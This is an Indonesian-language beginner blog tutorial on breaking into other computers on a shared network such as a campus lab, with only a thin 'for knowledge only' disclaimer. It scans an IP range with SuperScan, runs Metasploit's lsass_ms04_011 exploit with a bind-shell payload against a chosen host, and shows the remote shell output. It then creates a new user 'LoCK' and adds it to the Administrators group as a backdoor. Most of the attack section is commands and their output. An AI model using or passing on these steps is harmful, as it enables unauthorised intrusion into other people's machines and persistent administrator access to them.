Hacking windows NT,2000,XP

Artikel ini hanya untuk pengetahuan semata (PEMULA), penyalahgunaan diluar tanggung jawab penulis. Target running under Windows NT. Tujuan bagaimana cara masuk kesistem computer lain dalam sebuah jaringan computer misal lab kampus dll.

Peralatan yang diperlukan adalah:
 * Kita pakai OS Windows saja:
     1. IP Scanner (SuperScan versi 3.00 lumayan handal)
        Download di: http://www.webattack.com/get/superscan.shtml
     2. Metasploit Framework for Win32 (versi terbaru 2.3)
        Download di: http://metasploit.com/tools/framework-2.3.exe
     
* Download semua file yang diperlukan di atas.
* Install dulu Metasploit Framework, jalankan Setup nya 
(framework-2.3.exe)
* Install SuperScan.
* Selanjutnya kita cari target ... buka aplikasi IP Scanner (SuperScan) 
  isi Range IP Start dan Stop IP misalnya mulai 192.168.1.1 sampai 1   
  192.168.55.1 (tergantung keadaan Network Anda, sesuaikan sendiri 
  range targetnya).
 
* Misal IP yang kita dapatkan 192.168.10.230 dst.
* Setelah dapat daftar IP target, selanjutnya kita buka Metasploit  Framework.
* Setelah siap, muncul prompt: msf > ketik lah command berikut:
 
  ----- snapshot -----
  msf > use lsass_ms04_011  [ENTER]
  msf lsass_ms04_011 > set PAYLOAD win32_bind  [ENTER]
  msf lsass_ms04_011(win32_bind) > set RHOST 192.168.10.230  [ENTER]
  msf lsass_ms04_011(win32_bind) > exploit  [ENTER]
 
  [*] Starting Bind Handler.
  [*] Detected a Windows XP target (Prof_Joni)
  [*] Windows XP may require two attempts
  [*] Sending 8 DCE request fragments...
  [*] Sending the final DCE fragment
  [*] Got connection from 192.168.10.230:4321 <-> 192.168.1.80:4444
 
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
 
  C:\WINDOWS\system32>_
  ----- akhir snapshot -----  
 
 
Nah, jika tampil seperti itu berarti kita sudah mendapatkan Dropped Shell di Metasploit kita. Yang tampil disana adalah Shell dari komputer target kita ... yang terhubung  secara remote.  Dimana di Shell tersebut kita punya hak akses Administrator (karena hasil exploit Buffer Overflow).
 
  Artinya: kita punya HAk tak terbatas terhadap komputer target kita :)
  Untuk mengetes, cobak aja ketikkan di sana perintah berikut:
 
     C:\WINDOWS\system32> NET USER LoCK /ADD
     C:\WINDOWS\system32> net localgroup Administrators LoCK /add
 
  --- snapshot ---
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
 
  C:\WINDOWS\system32>NET USER LoCK /ADD
  NET USER LoCK /ADD
  The command completed successfully.
 
  C:\WINDOWS\system32>net localgroup Administrators LoCK /add
  net localgroup Administrators LoCK /add
  The command completed successfully.
  --- akhir snapshot ---
 
Tuh kan, kita bisa menambah user baru dengan group Administrator di 
komputer target. selesai.. semoga bermanfaat

 

%d bloggers like this: